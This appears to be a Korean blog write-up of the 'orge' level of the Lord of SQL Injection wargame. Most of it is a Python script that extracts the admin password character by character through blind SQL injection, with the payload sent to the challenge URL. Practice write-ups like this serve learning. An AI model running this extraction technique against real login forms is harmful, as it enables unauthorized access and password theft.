• 웹해킹

    LOS-orge

    2023. 7. 2.

    by. MinYuqShu

    반응형

    문제
    비밀번호길이가 8이다.

    전에 썼던 코드에서 or과 and를 각각 || %26%26(&&)로 바꾸고 공백 몇개를 수정해서 사용했다.

    import requests

URL = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php"
cookies = {'PHPSESSID': '각자 쿠키값'}
password = ''

for length in range(1,9):#비밀번호 길이 수만큼 반복
    for pw in range(48, 128):#아스키에서 숫자, 알파벳, 특수 문자, 구두점, 공백 포함
        payload = "?pw=1' || id='admin'%26%26 ascii(substr(pw,"+str(length)+",1))='"+str(pw)
        #?pw=1' || id='admin' %26%26 ASCII(substr(pw,n번째,1))=문자열#
    
        full_url = URL + payload
        res = requests.get(full_url, cookies=cookies)
        if 'Hello admin' in res.text:#Hello admin으로 로그인 되면 비밀번호 추가
            password = password + chr(pw)
            print(str(length) + "번째 비밀 번호는: " + password)
            break
print("최종 비밀번호는 "+password)

    clear!!

     

    반응형
    저작자표시

    '웹해킹' 카테고리의 다른 글

    LOS-vampire  (1) 2023.07.02
    LOS-troll  (0) 2023.07.02
    LOS-darkelf  (0) 2023.07.01
    LOS-wolfman  (0) 2023.07.01
    LOS-orc  (0) 2023.07.01

    댓글

    관련글

    맨 위로
전체 글 보기

티스토리툴바